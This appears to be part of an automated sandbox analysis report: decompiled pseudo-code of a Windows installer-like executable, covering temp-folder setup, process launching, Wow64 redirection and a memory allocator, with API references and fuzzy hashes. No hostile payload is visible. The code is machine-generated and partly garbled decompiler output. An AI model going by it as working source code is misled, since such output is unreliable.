                                                            				intOrPtr _t93;
                                                            				intOrPtr _t99;
                                                            				intOrPtr _t101;
                                                            				intOrPtr _t107;
                                                            				intOrPtr _t114;
                                                            				intOrPtr _t115;
                                                            				intOrPtr _t116;
                                                            				intOrPtr _t117;
                                                            				void* _t120;
                                                            				intOrPtr _t121;
                                                            
                                                            				_t119 = __esi;
                                                            				_t118 = __edi;
                                                            				_t85 = __ebx;
                                                            				_pop(_t101);
                                                            				_pop(_t88);
                                                            				 *[fs:eax] = _t101;
                                                            				E004AF678(_t88);
                                                            				if( *0x4ba440 == 0) {
                                                            					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
                                                            						_t61 =  *0x4ba674; // 0x4c0d0c
                                                            						_t4 = _t61 + 0x2f8; // 0x0
                                                            						_t63 = E004084EC( *_t4);
                                                            						_t88 = _t120 - 0x28;
                                                            						_t101 =  *0x4c1c48; // 0x0
                                                            						E00426F08(0xc2, _t120 - 0x28, _t101);
                                                            						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
                                                            							 *0x4ba44c = 2;
                                                            							E0041F238();
                                                            						}
                                                            					}
                                                            					E004056D0();
                                                            					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
                                                            					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
                                                            					_t26 =  *0x4c1d84; // 0x0
                                                            					E00422954(_t26, _t88, _t120 - 0x34);
                                                            					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
                                                            					_push( *((intOrPtr*)(_t120 - 0x30)));
                                                            					_t31 =  *0x4c1d94; // 0x0
                                                            					E00422660(_t31, _t120 - 0x38);
                                                            					_pop(_t90);
                                                            					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
                                                            					_t107 =  *0x4c1d98; // 0x0
                                                            					E00407E00(0x4c1d9c, _t107);
                                                            					_t37 =  *0x4c1d90; // 0x4d703c
                                                            					_t15 = _t37 + 0x14; // 0x41c6fb
                                                            					_t38 =  *0x4c1d88; // 0x0
                                                            					E00423CE8(_t38,  *_t15);
                                                            					_push(_t120);
                                                            					_push(0x4b63ab);
                                                            					_push( *[fs:edx]);
                                                            					 *[fs:edx] = _t121;
                                                            					 *0x4c1de0 = 0;
                                                            					_t42 = E00423D00(1, 0, 1, 0); // executed
                                                            					 *0x4c1d8c = _t42;
                                                            					_push(_t120);
                                                            					_push(0x4b639a);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t121;
                                                            					_t44 =  *0x4c1d90; // 0x4d703c
                                                            					_t16 = _t44 + 0x18; // 0x30be00
                                                            					 *0x4c1de0 = E004053F0( *_t16);
                                                            					_t47 =  *0x4c1d90; // 0x4d703c
                                                            					_t17 = _t47 + 0x18; // 0x30be00
                                                            					_t86 =  *0x4c1de0; // 0x7fba0010
                                                            					E00405884(_t86,  *_t17);
                                                            					_push(_t120);
                                                            					_push(0x4b62e9);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t121;
                                                            					_t51 =  *0x424cd8; // 0x424d30
                                                            					_t93 =  *0x4c1d88; // 0x0
                                                            					_t53 = E00424748(_t93, 1, _t51); // executed
                                                            					 *0x4c1de4 = _t53;
                                                            					_push(_t120);
                                                            					_push(0x4b62d8);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t121;
                                                            					_t55 =  *0x4c1d90; // 0x4d703c
                                                            					_t18 = _t55 + 0x18; // 0x30be00
                                                            					_t56 =  *0x4c1de4; // 0x9aac00
                                                            					E00424A24(_t56,  *_t18, _t86);
                                                            					_pop(_t114);
                                                            					 *[fs:eax] = _t114;
                                                            					_push(E004B62DF);
                                                            					_t59 =  *0x4c1de4; // 0x9aac00
                                                            					return E00405CE8(_t59);
                                                            				} else {
                                                            					_t69 =  *0x4ba674; // 0x4c0d0c
                                                            					_t1 = _t69 + 0x1d0; // 0x0
                                                            					E004AFA44( *_t1, __ebx, __edi, __esi);
                                                            					 *0x4ba44c = 0;
                                                            					_pop(_t115);
                                                            					 *[fs:eax] = _t115;
                                                            					_push(E004B6554);
                                                            					_t74 =  *0x4c1d88; // 0x0
                                                            					_t75 = E00405CE8(_t74);
                                                            					if( *0x4c1d9c != 0) {
                                                            						_t117 =  *0x4c1d9c; // 0x0
                                                            						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
                                                            					}
                                                            					if( *0x4c1d94 != 0) {
                                                            						_t82 =  *0x4c1d94; // 0x0
                                                            						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
                                                            					}
                                                            					if( *0x4ba450 != 0) {
                                                            						_t81 =  *0x4ba450; // 0x120262
                                                            						_t75 = DestroyWindow(_t81); // executed
                                                            					}
                                                            					if( *0x4c1d78 != 0) {
                                                            						_t76 =  *0x4c1d78; // 0x0
                                                            						_t99 =  *0x4c1d7c; // 0x1
                                                            						_t116 =  *0x426bb0; // 0x426bb4
                                                            						E00408D08(_t76, _t99, _t116);
                                                            						_t78 =  *0x4c1d78; // 0x0
                                                            						E0040540C(_t78);
                                                            						 *0x4c1d78 = 0;
                                                            						return 0;
                                                            					}
                                                            					return _t75;
                                                            				}
                                                            			}





































                                                            APIs
                                                            • MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179
                                                              • Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                            • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                            • DestroyWindow.USER32(00120262,004B6554), ref: 004B6514
                                                              • Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                              • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                              • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
                                                            • String ID: .tmp$0MB$<pM
                                                            • API String ID: 3858953238-1900878030
                                                            • Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                            • Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
                                                            • Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                            • Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
                                                            			E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                            				char _v8;
                                                            				struct _STARTUPINFOW _v76;
                                                            				void* _v88;
                                                            				void* _v92;
                                                            				int _t23;
                                                            				intOrPtr _t49;
                                                            				DWORD* _t51;
                                                            				void* _t56;
                                                            
                                                            				_v8 = 0;
                                                            				_t51 = __ecx;
                                                            				_t53 = __edx;
                                                            				_t41 = __eax;
                                                            				_push(_t56);
                                                            				_push(0x4af7ff);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t56 + 0xffffffa8;
                                                            				_push(0x4af81c);
                                                            				_push(__eax);
                                                            				_push(0x4af82c);
                                                            				_push(__edx);
                                                            				E004087C4( &_v8, __eax, 4, __ecx, __edx);
                                                            				E00405884( &_v76, 0x44);
                                                            				_v76.cb = 0x44;
                                                            				_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
                                                            				_t58 = _t23;
                                                            				if(_t23 == 0) {
                                                            					E004AF34C(0x83, _t41, 0, _t53, _t58);
                                                            				}
                                                            				CloseHandle(_v88);
                                                            				do {
                                                            					E004AF6FC();
                                                            				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1);
                                                            				E004AF6FC();
                                                            				GetExitCodeProcess(_v92, _t51); // executed
                                                            				CloseHandle(_v92);
                                                            				_pop(_t49);
                                                            				 *[fs:eax] = _t49;
                                                            				_push(0x4af806);
                                                            				return E00407A20( &_v8);
                                                            			}












                                                            APIs
                                                            • CreateProcessW.KERNEL32 ref: 004AF798
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                            • MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                            • GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                            • CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                              • Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                            • String ID: D
                                                            • API String ID: 3356880605-2746444292
                                                            • Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                            • Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
                                                            • Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                            • Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _t16;
                                                            				intOrPtr _t32;
                                                            				intOrPtr _t41;
                                                            
                                                            				_t27 = __ebx;
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(_t41);
                                                            				_push(0x4b5b5a);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t41;
                                                            				 *0x4c1124 =  *0x4c1124 - 1;
                                                            				if( *0x4c1124 < 0) {
                                                            					 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
                                                            					 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
                                                            					if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
                                                            						_t16 = 0;
                                                            					} else {
                                                            						_t16 = 1;
                                                            					}
                                                            					 *0x4c1130 = _t16;
                                                            					E00422D44( &_v12);
                                                            					E00422660(_v12,  &_v8);
                                                            					E004086E4( &_v8, L"shell32.dll");
                                                            					E00421230(_v8, _t27, 0x8000); // executed
                                                            					E004232EC(0x4c783afb,  &_v16);
                                                            				}
                                                            				_pop(_t32);
                                                            				 *[fs:eax] = _t32;
                                                            				_push(0x4b5b61);
                                                            				return E00407A80( &_v16, 3);
                                                            			}










                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                            • API String ID: 1646373207-2130885113
                                                            • Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                            • Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
                                                            • Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                            • Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E00403EE8(signed int __eax) {
                                                            				signed int __ebx;
                                                            				signed int __edi;
                                                            				signed int __esi;
                                                            				void* _t96;
                                                            				void** _t99;
                                                            				signed int _t104;
                                                            				signed int _t109;
                                                            				signed int _t110;
                                                            				intOrPtr* _t114;
                                                            				void* _t116;
                                                            				void* _t121;
                                                            				signed int _t125;
                                                            				signed int _t129;
                                                            				signed int _t131;
                                                            				signed int _t132;
                                                            				signed int _t133;
                                                            				signed int _t134;
                                                            				signed int _t135;
                                                            				unsigned int _t141;
                                                            				signed int _t142;
                                                            				void* _t144;
                                                            				void* _t147;
                                                            				intOrPtr _t148;
                                                            				signed int _t150;
                                                            				long _t156;
                                                            				intOrPtr _t159;
                                                            				signed int _t162;
                                                            
                                                            				_t95 = __eax;
                                                            				_t129 =  *0x4bb059; // 0x0
                                                            				if(__eax > 0xa2c) {
                                                            					__eflags = __eax - 0x40a2c;
                                                            					if(__eax > 0x40a2c) {
                                                            						_pop(_t120);
                                                            						__eflags = __eax;
                                                            						if(__eax >= 0) {
                                                            							_push(_t120);
                                                            							_t162 = __eax;
                                                            							_t2 = _t162 + 0x10010; // 0x10110
                                                            							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
                                                            							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
                                                            							_t121 = _t96;
                                                            							if(_t121 != 0) {
                                                            								_t147 = _t121;
                                                            								 *((intOrPtr*)(_t147 + 8)) = _t162;
                                                            								 *(_t147 + 0xc) = _t156 | 0x00000004;
                                                            								E00403C48();
                                                            								_t99 =  *0x4bdb80; // 0x4bdb7c
                                                            								 *_t147 = 0x4bdb7c;
                                                            								 *0x4bdb80 = _t121;
                                                            								 *(_t147 + 4) = _t99;
                                                            								 *_t99 = _t121;
                                                            								 *0x4bdb78 = 0;
                                                            								_t121 = _t121 + 0x10;
                                                            							}
                                                            							return _t121;
                                                            						} else {
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            					} else {
                                                            						_t67 = _t95 + 0xd3; // 0x1d3
                                                            						_t125 = (_t67 & 0xffffff00) + 0x30;
                                                            						__eflags = _t129;
                                                            						if(__eflags != 0) {
                                                            							while(1) {
                                                            								asm("lock cmpxchg [0x4bbae8], ah");
                                                            								if(__eflags == 0) {
                                                            									goto L42;
                                                            								}
                                                            								asm("pause");
                                                            								__eflags =  *0x4bb989;
                                                            								if(__eflags != 0) {
                                                            									continue;
                                                            								} else {
                                                            									Sleep(0);
                                                            									asm("lock cmpxchg [0x4bbae8], ah");
                                                            									if(__eflags != 0) {
                                                            										Sleep(0xa);
                                                            										continue;
                                                            									}
                                                            								}
                                                            								goto L42;
                                                            							}
                                                            						}
                                                            						L42:
                                                            						_t68 = _t125 - 0xb30; // -2445
                                                            						_t141 = _t68;
                                                            						_t142 = _t141 >> 0xd;
                                                            						_t131 = _t141 >> 8;
                                                            						_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4);
                                                            						__eflags = 0xffffffff;
                                                            						if(0xffffffff == 0) {
                                                            							_t132 = _t142;
                                                            							__eflags = 0xfffffffe << _t132 &  *0x4bbaf4;
                                                            							if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
                                                            								_t133 =  *0x4bbaf0; // 0x0
                                                            								_t134 = _t133 - _t125;
                                                            								__eflags = _t134;
                                                            								if(_t134 < 0) {
                                                            									_t109 = E00403BCC(_t125);
                                                            								} else {
                                                            									_t110 =  *0x4bbaec; // 0x99aad0
                                                            									_t109 = _t110 - _t125;
                                                            									 *0x4bbaec = _t109;
                                                            									 *0x4bbaf0 = _t134;
                                                            									 *(_t109 - 4) = _t125 | 0x00000002;
                                                            								}
                                                            								 *0x4bbae8 = 0;
                                                            								return _t109;
                                                            							} else {
                                                            								asm("bsf edx, eax");
                                                            								asm("bsf ecx, eax");
                                                            								_t135 = _t132 | _t142 << 0x00000005;
                                                            								goto L50;
                                                            							}
                                                            						} else {
                                                            							asm("bsf eax, eax");
                                                            							_t135 = _t131 & 0xffffffe0 | _t104;
                                                            							L50:
                                                            							_push(_t152);
                                                            							_push(_t145);
                                                            							_t148 = 0x4bbb78 + _t135 * 8;
                                                            							_t159 =  *((intOrPtr*)(_t148 + 4));
                                                            							_t114 =  *((intOrPtr*)(_t159 + 4));
                                                            							 *((intOrPtr*)(_t148 + 4)) = _t114;
                                                            							 *_t114 = _t148;
                                                            							__eflags = _t148 - _t114;
                                                            							if(_t148 == _t114) {
                                                            								asm("rol eax, cl");
                                                            								_t80 = 0x4bbaf8 + _t142 * 4;
                                                            								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
                                                            								__eflags =  *_t80;
                                                            								if( *_t80 == 0) {
                                                            									asm("btr [0x4bbaf4], edx");
                                                            								}
                                                            							}
                                                            							_t150 = 0xfffffff0 &  *(_t159 - 4);
                                                            							_t144 = 0xfffffff0 - _t125;
                                                            							__eflags = 0xfffffff0;
                                                            							if(0xfffffff0 == 0) {
                                                            								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
                                                            								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
                                                            								__eflags =  *_t89;
                                                            							} else {
                                                            								_t116 = _t125 + _t159;
                                                            								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
                                                            								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
                                                            								__eflags = 0xfffffff0 - 0xb30;
                                                            								if(0xfffffff0 >= 0xb30) {
                                                            									E00403B00(_t116, 0xfffffffffffffff3, _t144);
                                                            								}
                                                            							}
                                                            							_t93 = _t125 + 2; // 0x1a5
                                                            							 *(_t159 - 4) = _t93;
                                                            							 *0x4bbae8 = 0;
                                                            							return _t159;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					__eflags = __cl;
                                                            					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
                                                            					__eax =  *_t6 & 0x000000ff;
                                                            					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
                                                            					if(__eflags != 0) {
                                                            						while(1) {
                                                            							__eax = 0x100;
                                                            							asm("lock cmpxchg [ebx], ah");
                                                            							if(__eflags == 0) {
                                                            								goto L5;
                                                            							}
                                                            							__ebx = __ebx + 0x20;
                                                            							__eflags = __ebx;
                                                            							__eax = 0x100;
                                                            							asm("lock cmpxchg [ebx], ah");
                                                            							if(__ebx != 0) {
                                                            								__ebx = __ebx + 0x20;
                                                            								__eflags = __ebx;
                                                            								__eax = 0x100;
                                                            								asm("lock cmpxchg [ebx], ah");
                                                            								if(__ebx != 0) {
                                                            									__ebx = __ebx - 0x40;
                                                            									asm("pause");
                                                            									__eflags =  *0x4bb989;
                                                            									if(__eflags != 0) {
                                                            										continue;
                                                            									} else {
                                                            										Sleep(0);
                                                            										__eax = 0x100;
                                                            										asm("lock cmpxchg [ebx], ah");
                                                            										if(__eflags != 0) {
                                                            											Sleep(0xa);
                                                            											continue;
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            							goto L5;
                                                            						}
                                                            					}
                                                            					L5:
                                                            					__edx =  *(__ebx + 8);
                                                            					__eax =  *(__edx + 0x10);
                                                            					__ecx = 0xfffffff8;
                                                            					__eflags = __edx - __ebx;
                                                            					if(__edx == __ebx) {
                                                            						__edx =  *(__ebx + 0x18);
                                                            						__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                            						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
                                                            						__eflags = __eax -  *(__ebx + 0x14);
                                                            						if(__eax >  *(__ebx + 0x14)) {
                                                            							_push(__esi);
                                                            							_push(__edi);
                                                            							__eflags =  *0x4bb059;
                                                            							if(__eflags != 0) {
                                                            								while(1) {
                                                            									__eax = 0x100;
                                                            									asm("lock cmpxchg [0x4bbae8], ah");
                                                            									if(__eflags == 0) {
                                                            										goto L22;
                                                            									}
                                                            									asm("pause");
                                                            									__eflags =  *0x4bb989;
                                                            									if(__eflags != 0) {
                                                            										continue;
                                                            									} else {
                                                            										Sleep(0);
                                                            										__eax = 0x100;
                                                            										asm("lock cmpxchg [0x4bbae8], ah");
                                                            										if(__eflags != 0) {
                                                            											Sleep(0xa);
                                                            											continue;
                                                            										}
                                                            									}
                                                            									goto L22;
                                                            								}
                                                            							}
                                                            							L22:
                                                            							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
                                                            							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
                                                            							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
                                                            								__ecx =  *(__ebx + 4) & 0x0000ffff;
                                                            								__edi =  *0x4bbaf0; // 0x0
                                                            								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
                                                            								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
                                                            									__eax =  *(__ebx + 6) & 0x0000ffff;
                                                            									__edi = __eax;
                                                            									__eax = E00403BCC(__eax);
                                                            									__esi = __eax;
                                                            									__eflags = __eax;
                                                            									if(__eax != 0) {
                                                            										goto L35;
                                                            									} else {
                                                            										 *0x4bbae8 = __al;
                                                            										 *__ebx = __al;
                                                            										_pop(__edi);
                                                            										_pop(__esi);
                                                            										_pop(__ebx);
                                                            										return __eax;
                                                            									}
                                                            								} else {
                                                            									__esi =  *0x4bbaec; // 0x99aad0
                                                            									__ecx =  *(__ebx + 6) & 0x0000ffff;
                                                            									__edx = __ecx + 0xb30;
                                                            									__eflags = __edi - __ecx + 0xb30;
                                                            									if(__edi >= __ecx + 0xb30) {
                                                            										__edi = __ecx;
                                                            									}
                                                            									__esi = __esi - __edi;
                                                            									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
                                                            									 *0x4bbaec = __esi;
                                                            									goto L35;
                                                            								}
                                                            							} else {
                                                            								asm("bsf eax, esi");
                                                            								__esi = __eax * 8;
                                                            								__ecx =  *(0x4bbaf8 + __eax * 4);
                                                            								asm("bsf ecx, ecx");
                                                            								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
                                                            								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
                                                            								__esi =  *(__edi + 4);
                                                            								__edx =  *(__esi + 4);
                                                            								 *(__edi + 4) = __edx;
                                                            								 *__edx = __edi;
                                                            								__eflags = __edi - __edx;
                                                            								if(__edi == __edx) {
                                                            									__edx = 0xfffffffe;
                                                            									asm("rol edx, cl");
                                                            									_t38 = 0x4bbaf8 + __eax * 4;
                                                            									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
                                                            									__eflags =  *_t38;
                                                            									if( *_t38 == 0) {
                                                            										asm("btr [0x4bbaf4], eax");
                                                            									}
                                                            								}
                                                            								__edi = 0xfffffff0;
                                                            								__edi = 0xfffffff0 &  *(__esi - 4);
                                                            								__eflags = 0xfffffff0 - 0x10a60;
                                                            								if(0xfffffff0 < 0x10a60) {
                                                            									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
                                                            									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
                                                            									__eflags =  *_t52;
                                                            								} else {
                                                            									__edx = __edi;
                                                            									__edi =  *(__ebx + 6) & 0x0000ffff;
                                                            									__edx = __edx - __edi;
                                                            									__eax = __edi + __esi;
                                                            									__ecx = __edx + 3;
                                                            									 *(__eax - 4) = __ecx;
                                                            									 *(__edx + __eax - 8) = __edx;
                                                            									__eax = E00403B00(__eax, __ecx, __edx);
                                                            								}
                                                            								L35:
                                                            								_t56 = __edi + 6; // 0x6
                                                            								__ecx = _t56;
                                                            								 *(__esi - 4) = _t56;
                                                            								__eax = 0;
                                                            								 *0x4bbae8 = __al;
                                                            								 *__esi = __ebx;
                                                            								 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                            								 *((intOrPtr*)(__esi + 0x14)) = 1;
                                                            								 *(__ebx + 0x18) = __esi;
                                                            								_t61 = __esi + 0x20; // 0x99aaf0
                                                            								__eax = _t61;
                                                            								__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                            								__edx = __ecx + __eax;
                                                            								 *(__ebx + 0x10) = __ecx + __eax;
                                                            								__edi = __edi + __esi;
                                                            								__edi = __edi - __ecx;
                                                            								__eflags = __edi;
                                                            								 *(__ebx + 0x14) = __edi;
                                                            								 *__ebx = 0;
                                                            								 *(__eax - 4) = __esi;
                                                            								_pop(__edi);
                                                            								_pop(__esi);
                                                            								_pop(__ebx);
                                                            								return __eax;
                                                            							}
                                                            						} else {
                                                            							_t19 = __edx + 0x14;
                                                            							 *_t19 =  *(__edx + 0x14) + 1;
                                                            							__eflags =  *_t19;
                                                            							 *(__ebx + 0x10) = __ecx;
                                                            							 *__ebx = 0;
                                                            							 *(__eax - 4) = __edx;
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						}
                                                            					} else {
                                                            						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
                                                            						__ecx = 0xfffffff8 &  *(__eax - 4);
                                                            						__eflags = 0xfffffff8;
                                                            						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
                                                            						 *(__eax - 4) = __edx;
                                                            						if(0xfffffff8 == 0) {
                                                            							__ecx =  *(__edx + 8);
                                                            							 *(__ecx + 0xc) = __ebx;
                                                            							 *(__ebx + 8) = __ecx;
                                                            							 *__ebx = 0;
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						} else {
                                                            							 *__ebx = 0;
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
                                                            • Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
                                                            • Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
                                                            • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                            • Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
